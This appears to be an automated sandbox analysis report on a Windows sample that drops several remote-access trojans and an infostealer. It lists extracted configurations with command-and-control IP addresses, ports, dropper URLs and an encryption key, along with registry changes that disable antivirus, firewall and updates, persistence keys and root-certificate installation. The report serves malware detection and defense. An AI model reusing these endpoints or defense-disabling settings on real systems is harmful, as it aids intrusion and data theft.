asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
100s
max time network
150s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
22-05-2024 09:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

asyncrat purelogstealer quasar xworm default office04 discovery evasion execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted

Family

xworm

Version

5.0

85.203.4.146:7000

5.182.87.154:7000

Mutex

eItTbYBfBYihwkyW

Attributes

Install_directory
%Userprofile%
install_file
svchost.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

85.209.133.18:4545

5.182.87.154:4449

Mutex

tdipywykihsjieff

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

79.132.193.215:4782

Mutex

f99ccef5-65c4-4972-adf2-fb38921cc9fc

Attributes

encryption_key
1C15E91ACCFAC60B043A1336CF6912EA8572BA83
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
taskhostw.exe
pastebin_url
https://pastebin.com/raw/Xuc6dzua

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

127.0.0.1:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
behavioral5/memory/8380-6524-0x00000000001F0000-0x0000000000200000-memory.dmp	family_xworm
behavioral5/memory/7928-16756-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm
behavioral5/memory/3512-16779-0x0000000001140000-0x0000000001360000-memory.dmp	family_xworm
behavioral5/memory/2900-17071-0x0000000000CE0000-0x0000000000CF8000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\taskhostw.exe	family_xworm

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

sysblardsv.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysblardsv.exe
PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysblardsv.exe

PureLog Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral5/memory/2496-16724-0x0000000000580000-0x00000000005CC000-memory.dmp	family_purelog_stealer
behavioral5/memory/7268-16740-0x0000000000AB0000-0x0000000000AF8000-memory.dmp	family_purelog_stealer

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 3 IoCs

Processes:

resource	yara_rule
behavioral5/memory/4180-16455-0x0000000000880000-0x0000000000BA4000-memory.dmp	family_quasar
C:\Windows\System32\Client.exe	family_quasar
behavioral5/memory/4604-16468-0x0000000000CB0000-0x0000000000FD4000-memory.dmp	family_quasar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysblardsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\win1.exe	family_asyncrat

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

103 1984 powershell.exe
106 7248 powershell.exe
108 7248 powershell.exe

flow	pid	process
103	1984	powershell.exe
106	7248	powershell.exe
108	7248	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
7712	powershell.exe
3680	powershell.exe
7752	powershell.exe
4680	powershell.exe
3180	powershell.exe
9108	powershell.exe
1984	powershell.exe
7248	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

print.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts print.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	print.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Possible privilege escalation attempt 34 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exe

pid	process
1160	icacls.exe
7312	icacls.exe
8296	icacls.exe
9092	icacls.exe
9212	takeown.exe
4068	icacls.exe
5144	takeown.exe
8468	takeown.exe
8584	icacls.exe
2420	icacls.exe
6296	takeown.exe
1072	takeown.exe
6136	takeown.exe
8704	takeown.exe
2720	icacls.exe
2540	icacls.exe
6516	icacls.exe
8140	takeown.exe
8888	icacls.exe
8964	takeown.exe
5688	takeown.exe
5848	icacls.exe
6444	icacls.exe
7488	icacls.exe
2024	takeown.exe
5824	takeown.exe
6832	takeown.exe
7924	icacls.exe
700	icacls.exe
5080	takeown.exe
6412	takeown.exe
1540	takeown.exe
5876	icacls.exe
3820	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe

Executes dropped EXE 49 IoCs

Processes:

eagleget-2-1-6-50.exeAntiVirus2.exeSetup.exesvchost.exewin1.exeoutput.exeSIG.EXEalabi.execrt.execrt.tmpsoundermidiplayer.exeoiii.exesoundermidiplayer.execonhost.exewmpnetwk.exe7z.exe7z.exe7z.exesvcshost.exesdf34ert3etgrthrthfghfghjfgh.exekat3C07.tmpo2i3jroi23joj23ikrjokij3oroi.exekat41D1.tmpinte.exevpn-1002.exetdrpload.exeprint.exesysblardsv.exe222.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exePirate_24S.exeupdater.execlient.exereverse.exe767226468.exeClient.exe64.exesyslmgrsvc.exe

pid	process
2852	eagleget-2-1-6-50.exe
240	AntiVirus2.exe
8300	Setup.exe
8380	svchost.exe
8424	win1.exe
8868	output.exe
8968	SIG.EXE
9084	alabi.exe
4472	crt.exe
4608	crt.tmp
7848	soundermidiplayer.exe
8160	oiii.exe
3316	soundermidiplayer.exe
1484	conhost.exe
2700	wmpnetwk.exe
7160	7z.exe
7288	7z.exe
7400	7z.exe
7508	svcshost.exe
7728	sdf34ert3etgrthrthfghfghjfgh.exe
7876	kat3C07.tmp
8824	o2i3jroi23joj23ikrjokij3oroi.exe
8988	kat41D1.tmp
2604	inte.exe
4056	vpn-1002.exe
6380	tdrpload.exe
3352	print.exe
5312	sysblardsv.exe
2220	222.exe
3076	7z.exe
3200	7z.exe
3816	7z.exe
4124	7z.exe
4324	7z.exe
4660	7z.exe
5048	7z.exe
5284	7z.exe
5700	7z.exe
6584	Installer.exe
8600	Pirate_24S.exe
484
7132	updater.exe
1380
4180	client.exe
4412	reverse.exe
4488	767226468.exe
4604	Client.exe
3652	64.exe
4816	syslmgrsvc.exe

Loads dropped DLL 64 IoCs

Processes:

New Text Document mod.exeSetup.exeoutput.execomp.execrt.execrt.tmpFUT.au3WerFault.execmd.exe7z.exe7z.exe7z.exesdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exevpn-1002.execmd.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
2956	New Text Document mod.exe
8300	Setup.exe
8300	Setup.exe
8300	Setup.exe
8868	output.exe
8480	comp.exe
4472	crt.exe
4608	crt.tmp
4608	crt.tmp
4608	crt.tmp
4608	crt.tmp
4608	crt.tmp
2956	New Text Document mod.exe
3552	FUT.au3
3648	WerFault.exe
3648	WerFault.exe
3648	WerFault.exe
3648	WerFault.exe
3648	WerFault.exe
7036	cmd.exe
7160	7z.exe
7036	cmd.exe
7288	7z.exe
7036	cmd.exe
7400	7z.exe
7728	sdf34ert3etgrthrthfghfghjfgh.exe
7728	sdf34ert3etgrthrthfghfghjfgh.exe
8824	o2i3jroi23joj23ikrjokij3oroi.exe
8824	o2i3jroi23joj23ikrjokij3oroi.exe
4056	vpn-1002.exe
2956	New Text Document mod.exe
2956	New Text Document mod.exe
2756	cmd.exe
3076	7z.exe
2756	cmd.exe
3200	7z.exe
2756	cmd.exe
3816	7z.exe
2756	cmd.exe
4124	7z.exe
2756	cmd.exe
4324	7z.exe
2756	cmd.exe
4660	7z.exe
2756	cmd.exe
5048	7z.exe
2756	cmd.exe
5284	7z.exe
2756	cmd.exe
5700	7z.exe
2756	cmd.exe
2756	cmd.exe
484
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380
1380

Modifies file permissions 1 TTPs 34 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exe

pid	process
2720	icacls.exe
5848	icacls.exe
6412	takeown.exe
8296	icacls.exe
8468	takeown.exe
8704	takeown.exe
1160	icacls.exe
6136	takeown.exe
6296	takeown.exe
5080	takeown.exe
7488	icacls.exe
1540	takeown.exe
2540	icacls.exe
2420	icacls.exe
2024	takeown.exe
8888	icacls.exe
8140	takeown.exe
8584	icacls.exe
3820	takeown.exe
5876	icacls.exe
6832	takeown.exe
4068	icacls.exe
6444	icacls.exe
1072	takeown.exe
9212	takeown.exe
5824	takeown.exe
5144	takeown.exe
9092	icacls.exe
6516	icacls.exe
7924	icacls.exe
8964	takeown.exe
5688	takeown.exe
7312	icacls.exe
700	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysblardsv.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysblardsv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysblardsv.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

SIG.EXEtdrpload.exe767226468.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmokeUnity = "C:\\Users\\Admin\\Documents\\Mochacha\\NaturalValue.exe"	SIG.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysblardsv.exe"	tdrpload.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syslmgrsvc.exe"	767226468.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

200 raw.githubusercontent.com
201 raw.githubusercontent.com
241 pastebin.com
242 pastebin.com
18 raw.githubusercontent.com
19 raw.githubusercontent.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

37 ip-api.com
220 ip-api.com

flow	ioc
200	raw.githubusercontent.com
201	raw.githubusercontent.com
241	pastebin.com
242	pastebin.com
18	raw.githubusercontent.com
19	raw.githubusercontent.com

flow	ioc
37	ip-api.com
220	ip-api.com

Drops file in System32 directory 24 IoCs

Processes:

cmd.execlient.exe

description	ioc	process
File opened for modification	C:\Windows\system32\user32.dll	cmd.exe
File opened for modification	C:\Windows\system32\winver.exe	cmd.exe
File created	C:\Windows\SysWOW64\winver.exe	cmd.exe
File opened for modification	C:\Windows\system32\Client.exe	client.exe
File opened for modification	C:\Windows\system32\slwga.dll	cmd.exe
File opened for modification	C:\Windows\system32\sppwmi.dll	cmd.exe
File created	C:\Windows\system32\systemcpl.dll	cmd.exe
File created	C:\Windows\SysWOW64\sppwmi.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sppwmi.dll	cmd.exe
File created	C:\Windows\system32\Client.exe	client.exe
File created	C:\Windows\system32\slwga.dll	cmd.exe
File opened for modification	C:\Windows\system32\winlogon.exe	cmd.exe
File created	C:\Windows\SysWOW64\slwga.dll	cmd.exe
File created	C:\Windows\SysWOW64\systemcpl.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\user32.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\winver.exe	cmd.exe
File created	C:\Windows\system32\sppwmi.dll	cmd.exe
File opened for modification	C:\Windows\system32\systemcpl.dll	cmd.exe
File created	C:\Windows\system32\user32.dll	cmd.exe
File created	C:\Windows\system32\winlogon.exe	cmd.exe
File created	C:\Windows\system32\winver.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\slwga.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\systemcpl.dll	cmd.exe
File created	C:\Windows\SysWOW64\user32.dll	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

Setup.exeSIG.EXEsdf34ert3etgrthrthfghfghjfgh.exeo2i3jroi23joj23ikrjokij3oroi.exeupdater.exe

description	pid	process	target process
PID 8300 set thread context of 8480	8300	Setup.exe	comp.exe
PID 8968 set thread context of 5220	8968	SIG.EXE	csc.exe
PID 7728 set thread context of 7876	7728	sdf34ert3etgrthrthfghfghjfgh.exe	kat3C07.tmp
PID 8824 set thread context of 8988	8824	o2i3jroi23joj23ikrjokij3oroi.exe	kat41D1.tmp
PID 7132 set thread context of 5308	7132	updater.exe	conhost.exe
PID 7132 set thread context of 7428	7132	updater.exe	conhost.exe

Drops file in Program Files directory 5 IoCs

Processes:

oiii.exe

description	ioc	process
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe	oiii.exe
File created	C:\Program Files\Windows Media Player\wmixedwk.exe	oiii.exe
File opened for modification	C:\Program Files\Windows Media Player\wmixedwk.exe	oiii.exe
File created	C:\Program Files\Windows Media Player\background.jpg	oiii.exe
File created	C:\Program Files\Windows Media Player\mpsvc.dll	oiii.exe

Drops file in Windows directory 4 IoCs

Processes:

767226468.exetdrpload.exe

description	ioc	process
File opened for modification	C:\Windows\syslmgrsvc.exe	767226468.exe
File created	C:\Windows\sysblardsv.exe	tdrpload.exe
File opened for modification	C:\Windows\sysblardsv.exe	tdrpload.exe
File created	C:\Windows\syslmgrsvc.exe	767226468.exe

Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

6508 sc.exe
8040 sc.exe
2120 sc.exe
7288 sc.exe
2692 sc.exe
7056 sc.exe
7084 sc.exe
6660 sc.exe
7324 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3648 3552 WerFault.exe FUT.au3
5904 8376 WerFault.exe nine.exe

pid	process
6508	sc.exe
8040	sc.exe
2120	sc.exe
7288	sc.exe
2692	sc.exe
7056	sc.exe
7084	sc.exe
6660	sc.exe
7324	sc.exe

pid	pid_target	process	target process
3648	3552	WerFault.exe	FUT.au3
5904	8376	WerFault.exe	nine.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

kat3C07.tmpkat41D1.tmp

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	kat3C07.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	kat41D1.tmp

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3120 schtasks.exe
7384 schtasks.exe
4996 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

7032 tasklist.exe
4732 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

8888 taskkill.exe
2196 taskkill.exe

pid	process
3120	schtasks.exe
7384	schtasks.exe
4996	schtasks.exe

pid	process
7032	tasklist.exe
4732	tasklist.exe

pid	process
8888	taskkill.exe
2196	taskkill.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

regedit.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached	regedit.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	regedit.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	regedit.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache	regedit.exe

Modifies registry class 22 IoCs

Processes:

regedit.execontrol.exeregedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "3"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\MuiCache	control.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "0"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "3"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "2"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\MuiCache	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "2"	regedit.exe

Modifies system certificate store 2 TTPs 21 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

vpn-1002.exekat3C07.tmpeagleget-2-1-6-50.exewin1.exekat41D1.tmpNew Text Document mod.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	vpn-1002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	kat3C07.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	eagleget-2-1-6-50.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01